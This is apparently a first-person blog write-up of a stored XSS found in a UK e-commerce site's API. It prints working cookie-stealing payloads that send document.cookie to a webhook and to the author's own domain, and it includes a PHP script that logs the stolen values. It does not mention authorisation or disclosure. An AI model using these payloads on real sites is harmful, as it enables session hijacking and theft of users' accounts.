How I was able to steal cookies via stored XSS in one of the famous e-commerce site
Hi Readers,
I was very curious to find my first vulnerability and I was successful after many attempts. Finally I found my first vulnerability in one of the e-commerce site through which I was able to steal user cookies via stored XSS.
Below are the technical details for founded vulnerability:
I was going through one of the very famous e-commerce website of UK (United Kingdom) and found that the website also had its own APIs to use their data. So, I thought to play with their APIs. At the first attempt, I tried with simple alert java script in one of the API parameter which accepted string value. i.e. — <script>alert(‘Hello’)</script>. My request was processed successfully and server returned one id in response which I loaded in e-commerce site and it popped up an alert box.
After finding the vulnerable parameter I proceeded to steal user cookies. On my first attempt I tried using one third party webhook to steal user cookie.
I tried with “<script>document.write(‘<img src=\”https://putsreq.com/aqqiCg0uVRl3G72hAaa3?n='+document.cookie+'\"/>')</script>" in my vulnerable parameter. And what I got was BAD NEWS as I received an error from server that “Parameter length is too long”.
Then I realized about why can’t I use any third party hosting service and host one small script there and steal cookies. So, I prepared one php script with the help of my colleague that fetches the query parameter and writes it to log.txt. Below is the php script:
<?phpdate_default_timezone_set(“Asia/Kolkata”);if(isset($_GET[“name”])){echo $_GET[“name”];$log = date(“Y-m-d-h-i-s-”) . substr((string)microtime(), 2, 3) . “ — “ . $_GET[“name”] . PHP_EOL;file_put_contents(__DIR__.’/log.txt’, $log, FILE_APPEND);}else{echo “Name is not set.”;}?>
Hosted this script in third party hosting service. But I did not know that third party hosting service will use their name in domain. So my web application was like
“www.abc.thirdpartyservice.com/a.php" and it was definitely not going to work in vulnerable API parameter. On the very next day I decided to purchase my own domain containing only three letters.
So, I bought my own domain and hosted the php script. It was like “www.abc.com/a.php". Below was the API request that I actually used to steal cookies:
{parameter1:”1234"parameter2:”ABC1"parameter3:”<script>document.write(‘<img src=\”http://abc.com/a.php?n='+document.cookie+'\"/>')</script>"}
This request was successfully processed and server responded with id. On searching the generated id on e-commerce client side, user cookies were attached to the “n” parameter and php script pasted that cookies to text file.
This is how I was able to steal user cookies. It was a great experience!!
Thanks for reading.
